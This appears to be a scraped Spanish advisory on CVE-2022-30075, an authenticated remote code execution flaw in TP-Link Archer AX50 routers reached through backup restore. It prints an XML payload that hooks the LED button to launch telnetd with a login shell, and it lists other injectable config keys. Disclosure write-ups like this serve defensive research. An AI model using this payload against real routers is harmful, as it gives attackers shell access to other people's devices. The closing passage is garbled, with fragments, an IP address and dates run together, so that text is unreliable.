
Tp-Link Archer AX50 RCE Autenticado (CVE-2022-30075)
Ejecución remota de código autenticada en routers Tp-Link
Si tu router Tp-Link tiene funcionalidad de copia de seguridad y restauración y el firmware es anterior a junio de 2022, probablemente sea vulnerable.
Tp-Link Archer AX50, otros routers Tp-Link pueden usar un formato diferente de copias de seguridad y el exploit debe modificarse.
Uso del exploit para iniciar el daemon telnet en el router

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler, pero se puede omitir fácilmente cambiando el nombre del nodo xml padre (p. ej. name="exploit")system.button.handler, sino también usando ddns.service.ip_script, firewall.include.path, uhttpd.main, y otros.../usr/sbin/telnetd -l /bin/login.shtelnet 192.168.1.115.03.2022 - Vulnerabilidad identificada 15.03.2022 - Se contactó con el soporte de Tp-Link 16.03.2022 - Se recibió respuesta de Tp-Link 02.05.2022 - Se asignó CVE 27.05.2022 - Tp-Link publicó firmware con la vulnerabilidad corregida 07.06.2022 - Se publicaron los detalles técnicos